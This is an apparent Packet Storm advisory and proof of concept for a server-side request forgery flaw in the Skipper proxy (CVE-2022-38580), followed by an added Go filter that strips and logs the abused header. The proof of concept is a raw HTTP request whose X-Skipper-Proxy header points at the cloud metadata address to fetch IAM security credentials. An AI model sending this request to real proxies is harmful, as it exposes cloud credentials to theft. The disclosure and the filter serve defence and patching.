Packet Storm | Milad Fadavvi, Hosein Vita | PACKETSTORM:171546
History: Mar 28, 2023 - 12:00 a.m.

X-Skipper-Proxy 0.13.237 Server-Side Request Forgery


EPSS: 0.026 (Low), percentile 90.4%

`#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)  
#Date: 24/10/2022  
#Exploit Author: Hosein Vita & Milad Fadavvi  
#Vendor Homepage: https://github.com/zalando/skipper  
#Software Link: https://github.com/zalando/skipper  
#Version: < v0.13.237  
#Tested on: Linux  
#CVE: CVE-2022-38580  
  
  
Summary:  
  
Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of the proxy to access the internal metadata server or other unauthenticated URLs by adding a specific header (X-Skipper-Proxy) to the HTTP request.  
  
  
Proof Of Concept:  
  
1- Add header "X-Skipper-Proxy" to your request  
2- Add the AWS metadata to the path  
  
GET /latest/meta-data/iam/security-credentials HTTP/1.1  
Host: yourskipperdomain.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36  
X-Skipper-Proxy: http://169.254.169.254  
Connection: close  
  
  
  
  
Reference:  
https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2  
  
`
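
An added defensive example, not part of the original advisory or Skipper's own code: a Go `net/http` filter that could sit in front of an unpatched Skipper instance, dropping any client-supplied `X-Skipper-Proxy` header and reporting whether its value pointed at a loopback, private or link-local address such as the metadata endpoint in the request above. The names `StripProxyHeader`, `internalTarget` and `replay` are hypothetical, the replayed request is constructed, and hostnames in the header value are not resolved.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"net/url"
)

const proxyHeader = "X-Skipper-Proxy" // header named in the advisory

// internalTarget reports whether a header value is a URL whose host is a literal internal IP.
func internalTarget(value string) bool {
	u, err := url.Parse(value)
	if err != nil {
		return false
	}
	ip := net.ParseIP(u.Hostname())
	return ip != nil && (ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast())
}

// StripProxyHeader reports every client-supplied value, then deletes the header before forwarding.
func StripProxyHeader(next http.Handler, report func(remote, value string, internal bool)) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		for _, v := range r.Header.Values(proxyHeader) {
			report(r.RemoteAddr, v, internalTarget(v))
		}
		r.Header.Del(proxyHeader)
		next.ServeHTTP(w, r)
	})
}

// replay runs one constructed request through the filter and returns what the upstream saw.
func replay(value string) (forwarded string, flagged, internal bool) {
	upstream := http.HandlerFunc(func(_ http.ResponseWriter, r *http.Request) {
		forwarded = r.Header.Get(proxyHeader)
	})
	h := StripProxyHeader(upstream, func(_, _ string, in bool) { flagged, internal = true, in })
	req := httptest.NewRequest("GET", "/latest/meta-data/iam/security-credentials", nil)
	if value != "" {
		req.Header.Set(proxyHeader, value)
	}
	h.ServeHTTP(httptest.NewRecorder(), req)
	return forwarded, flagged, internal
}

func main() {
	fmt.Println(replay("http://169.254.169.254")) // constructed request
}
```

The `report` callback is where a deployment would write to its own log or alerting pipeline; any hit is worth reviewing, since ordinary clients have no reason to send this header.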
